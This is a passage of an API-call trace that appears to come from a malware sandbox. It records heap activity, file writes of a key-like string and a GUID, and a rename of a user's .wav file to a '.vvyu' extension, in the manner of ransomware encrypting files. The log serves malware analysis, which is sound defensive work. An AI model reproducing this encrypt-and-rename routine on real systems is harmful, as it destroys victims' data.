Size=0x2c) returned 0x2c84cc0 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.279] GetCurrentThreadId () returned 0x264 [0197.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3d8 [0197.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a438 [0197.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0197.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a450 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3f0 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3c0 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d238 | out: hHeap=0x6a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.290] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x15250, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x15250, lpOverlapped=0x0) returned 1 [0197.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.291] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x15255, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.291] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.292] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.293] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.293] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.293] CloseHandle (hObject=0x52c) returned 1 [0197.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d31688 [0197.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0197.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0197.296] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\X52P6pB3THpumW.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\x52p6pb3thpumw.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\X52P6pB3THpumW.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\x52p6pb3thpumw.wav.vvyu")) returned 1 [0197.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.298] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.301] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53d55170, ftCreationTime.dwHighDateTime=0x1d8a0ea, ftLastAccessTime.dwLowDateTime=0x82659fe0, ftLastAccessTime.dwHighDateTime=0x1d8a293, ftLastWriteTime.dwLowDateTime=0x82659fe0, ftLastWriteTime.dwHighDateTime=0x1d8a293, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yw2t95", cAlternateFileName="")) returned 1 [0197.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0197.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b578 [0197.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0197.302] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53d55170, ftCreationTime.dwHighDateTime=0x1d8a0ea, ftLastAccessTime.dwLowDateTime=0x82659fe0, ftLastAccessTime.dwHighDateTime=0x1d8a293, ftLastWriteTime.dwLowDateTime=0x82659fe0, ftLastWriteTime.dwHighDateTime=0x1d8a293, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yw2t95", cAlternateFileName="")) returned 0 [0197.302] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0197.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0197.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0197.303] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0197.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0197.304] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0197.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0197.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.316] RtlAllocateHeap 